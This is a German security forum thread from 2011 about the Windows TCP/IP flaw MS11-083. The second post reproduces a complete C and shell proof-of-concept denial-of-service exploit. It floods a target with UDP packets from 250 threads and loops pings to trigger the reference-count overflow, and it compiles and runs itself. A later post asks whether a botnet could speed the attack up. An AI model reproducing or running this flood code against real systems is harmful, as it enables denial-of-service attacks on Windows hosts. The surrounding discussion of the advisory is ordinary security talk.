Microsoft Security MS11-083 - Kritisch: (TCP/IP) Remotecode ausführung via UDP

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von dreamax, 13. November 2011 .

  1. 13. November 2011
    Quelle: technet.microsoft.com

    Vielleicht für den ein oder anderen ganz interessant..
     
  2. 14. November 2011
    AW: Microsoft Security MS11-083 - Kritisch: (TCP/IP) Remotecode ausführung via UDP

    Code:
    #!/bin/sh
    cat >> winnuke2011.c << EOF
    /*
    * MS11-083 DoS/PoC exploit
    * ========================
    * This attempts to trigger the ICMP refCount overflow 
    * in TCP/IP stack of Win7/Vista/Win2k8 hosts. This
    * requires sending 2^32 UDP packets to a host on a closed
    * port, or 4,294,967,296 packets. A dereference function
    * must be called that is not triggered via UDP but ICMP 
    * echo packets. This exploit creates 250 threads and
    * floods a host with UDP packets and then attempts to
    * trigger the de-ref using ping. [B]I calculated that it
    * would take approximately 52 days for the host to
    * enter a condition where this vulnerability is
    * triggerable.[/B]
    *
    * -- prdelka
    */
    #include <stdio.h>
    #include <stdlib.h>
    #include <pthread.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #include <netdb.h>
    #include <stdio.h>
    #include <unistd.h>
    #include <string.h>
    #include <sys/time.h>
     
    int port;
    int active = 0;
    pthread_mutex_t mutexactive;
    void *sendpackets(void *ptr);
     
    int main(int argc, char *argv[]) {
     pthread_t thread;
     int iret,lthreads;
     pid_t pid;
     printf("[+] MS11-083 DoS/PoC exploit\n");
     if(argc<3){
     printf("[!] Usage : %s <server> <port>\n", argv[0]);
     exit(1);
     }
     char *const args[] = {"ping",argv[1],NULL};
     char *const envp[] = {"",NULL};
     port = atoi(argv[2]);
     for(lthreads=0;lthreads<250;lthreads++){//UDP flood
     iret = pthread_create(&thread,NULL,sendpackets,argv[1]);
     printf("[-] Thread number %d started\n",lthreads);
     sleep(1);
     }
     printf("[-] One does not simply barrel roll into Mordor\n");
     pid = fork();
     if(pid==0){// trigger deref.
     execve("./ping.sh",args,envp);
     };
     while(active){
     }
     printf("[-] You are finished. Patience is a virtue.\n");
     exit(0);
    }
     
    void *sendpackets(void *ptr)
    {
     int sd, rc, n, echoLen, flags, error, timeOut;
     unsigned long i;
     struct sockaddr_in remoteServAddr;
     struct hostent *h;
     char str[41];
     pthread_mutex_lock(&mutexactive);
     active++;
     pthread_mutex_unlock(&mutexactive);
     srand(time(NULL));
     for (i = 0;i < 40;++i){
     str[i] = (char)((rand() % 78) + 30);
     }
     str[40] = '\0'; // yes this was off-by-one. :(
     printf("[-] Sending payload '%s'\n",str);
     h = gethostbyname(ptr);
     if(h==NULL) {
     printf("unknown host '%s' \n",(char*)ptr);
     exit(1);
     }
     remoteServAddr.sin_family = h->h_addrtype;
     memcpy((char *) &remoteServAddr.sin_addr.s_addr,h->h_addr_list[0], h->h_length);
     remoteServAddr.sin_port = htons(port);
     sd = socket(AF_INET,SOCK_DGRAM,0);
     if(sd<0){
     printf("[!] Cannot open socket\n");
     pthread_exit((void*)0);
     }
     flags = 0;
     for(i=0;i<4294967295;i++){
     rc = sendto(sd,str,strlen(str)+1,flags,(struct sockaddr *)&remoteServAddr,sizeof(remoteServAddr));
     if(rc<0){
     printf("[!] Cannot send data\n");
     close(sd);
     pthread_exit((void*)0);
     }
     }
     pthread_mutex_lock(&mutexactive);
     active--;
     pthread_mutex_unlock(&mutexactive);
     pthread_exit(NULL);
    }
    EOF
    cat >> ping.sh << EOF
    #!/bin/sh
    while \`true\`;do /sbin/ping -c 1 \$1;done
    EOF
    chmod +x ping.sh
    gcc winnuke2011.c -o winnuke2011
    ./winnuke2011
    Habe das POC nicht getestet, finde im Prinzip den markierten Teil Interessant, da das die Sache doch schon wieder etwas beschränkt. (Originale Quelle habe ich dazu nicht gefunden.)
     
  3. 14. November 2011
    AW: Microsoft Security MS11-083 - Kritisch: (TCP/IP) Remotecode ausführung via UDP

    Wer Auto-Updates an hat braucht sich darum eh nicht kümmern. Ich mein man muss jetzt nicht jedes Teil posten was irgendwie gefährlich ist. Das TrueType Ding war mal eine Ausnahme.

    Wer Auto-Update aus hat ist eh doof und wer kein Win 7 x64 einsetzt sowieso
     
  4. 21. November 2011
    AW: Microsoft Security MS11-083 - Kritisch: (TCP/IP) Remotecode ausführung via UDP

    Also ist das ein Exploit den man über ein Botnetzwerk testen könnte oder einfach 52 Tage brauch dafür?


    Meine Frage is jetzt warum brauch das so lange? Wird der Code erst bei einem Überlauffehler eingeschleust oder wie ?
     
  5. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.